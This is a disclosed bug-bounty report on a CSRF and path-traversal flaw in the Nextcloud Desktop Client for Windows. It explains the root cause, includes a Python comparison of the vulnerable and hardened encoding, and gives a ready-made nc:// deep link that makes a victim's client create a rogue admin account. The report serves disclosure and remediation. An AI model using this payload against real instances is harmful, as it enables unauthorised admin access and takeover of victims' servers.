HackerOne report #1741430 (lukasreschke), Oct 18, 2022 - 6:36 p.m.

Nextcloud: CSRF vulnerability in Nextcloud Desktop Client 3.6.1 on Windows when clicking malicious link

2022-10-18 18:36:38, lukasreschke, hackerone.com

EPSS: 0.001 (Low), Percentile: 41.1%

Summary

It is possible to make a user send any POST request with an arbitrary body, given they click on a malicious deep link (e.g. in an email or chat message).

This vulnerability was introduced in an attempt to fix #1720043. The patch, however, can be bypassed and also introduces a CSRF vulnerability.

Steps To Reproduce:

The following reproduction steps send an OCS API request to the /ocs/v1.php/cloud/users endpoint with the following POST body: path=/.\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log. If the victim is not an administrator, one would need to target another controller.

  1. Open the following deeplink on a Windows machine with the Nextcloud Desktop Client installed. Make sure to adjust the victim username and instance URL: nc://open/[email protected]/.\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log?token=../../../../../../../ocs/v1.php/cloud/users
  2. Verify that a user called “hacker” is created on the instance and added to the admin group.

Root cause

The attempt to fix #1720043 was done with https://github.com/nextcloud/desktop/pull/5055 and introduced the following code:

    // `token` comes straight from the deep link and is interpolated into the URL path unencoded
    const auto checkTokenForEditLocally = new SimpleApiJob(accountFound->account(), QStringLiteral("/ocs/v2.php/apps/files/api/v1/openlocaleditor/%1").arg(token));
    checkTokenForEditLocally->setVerb(SimpleApiJob::Verb::Post);
    // `relPath` is appended to the form body unencoded, so '&' and '=' inside it become extra POST parameters
    checkTokenForEditLocally->setBody(QByteArray{"path=/"}.append(relPath.toUtf8()));

There are two vulnerabilities here that can be chained together:

  • Token is not encoded: `token` is concatenated directly into the URL and not properly encoded. Passing a token such as ?token=../../../../../../../ocs/v1.php/cloud/users will therefore make the request go to /ocs/v2.php/apps/files/api/v1/openlocaleditor/../../../../../../../ocs/v1.php/cloud/users, which resolves to /ocs/v1.php/cloud/users.
  • Relative file path is not encoded: `relPath` is concatenated directly into the POST body and not properly encoded. Passing a path such as .\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log will therefore create several POST parameters. (Note: ./owncloudsync.log is a default file which I use here to ensure the file-exists check earlier in the code passes.)
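The two encoding defects above, illustrated in Python as an added example (this is not code from the Nextcloud client): a stand-in for the unpatched string concatenation beside a hardened builder that percent-encodes both pieces, plus the checks a server-side parser would apply. The sample inputs, the helper names and the token alphabet used by `is_well_formed_token` are constructed assumptions, not taken from the project.

```python
import posixpath
import re
from urllib.parse import parse_qs, quote, urlsplit

OPENLOCALEDITOR = "/ocs/v2.php/apps/files/api/v1/openlocaleditor/"

# Constructed sample inputs: a token that tries to climb out of the
# openlocaleditor route, and a relative path carrying form delimiters.
TRAVERSAL_TOKEN = "../../../../../../../ocs/v1.php/cloud/users"
INJECTED_RELPATH = "docs/report.txt&userid=injected&groups[]=admin"


def build_request_vulnerable(token: str, rel_path: str) -> tuple[str, str]:
    """Stand-in for the unpatched concatenation: raw token in the URL path,
    raw rel_path in the form body."""
    return OPENLOCALEDITOR + token, "path=/" + rel_path


def build_request_hardened(token: str, rel_path: str) -> tuple[str, str]:
    """Percent-encode both pieces. safe='' also encodes '/', so the token
    stays one path segment; in the body '&' and '=' are encoded."""
    return OPENLOCALEDITOR + quote(token, safe=""), "path=/" + quote(rel_path, safe="/")


def is_well_formed_token(token: str) -> bool:
    """Defense in depth: reject anything outside an assumed token alphabet
    (hypothetical charset; confirm the real token format before adopting)."""
    return re.fullmatch(r"[A-Za-z0-9_-]+", token) is not None


def effective_route(url: str) -> str:
    """Path the server acts on after dot-segment removal (RFC 3986 5.2.4)."""
    return posixpath.normpath(urlsplit(url).path)


def body_params(body: str) -> dict[str, list[str]]:
    """Parameters a form-urlencoded parser extracts from the body."""
    return parse_qs(body, keep_blank_values=True)


if __name__ == "__main__":
    for builder in (build_request_vulnerable, build_request_hardened):
        url, body = builder(TRAVERSAL_TOKEN, INJECTED_RELPATH)
        print(builder.__name__, effective_route(url), body_params(body))
```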

Supporting Material/References:

  • Screenshot of the request: F1992646
  • Screenshot of the created user: F1992654

Disclosure Policy

Please note that all bugs reported by Authentick GmbH will be publicly disclosed within 90 days of vendor notification. In extraordinary cases we may increase that upon request by the vendor.

Impact

It is possible to make a user send any POST request with an arbitrary body, given they click on a malicious deep link (e.g. in an email or chat message).
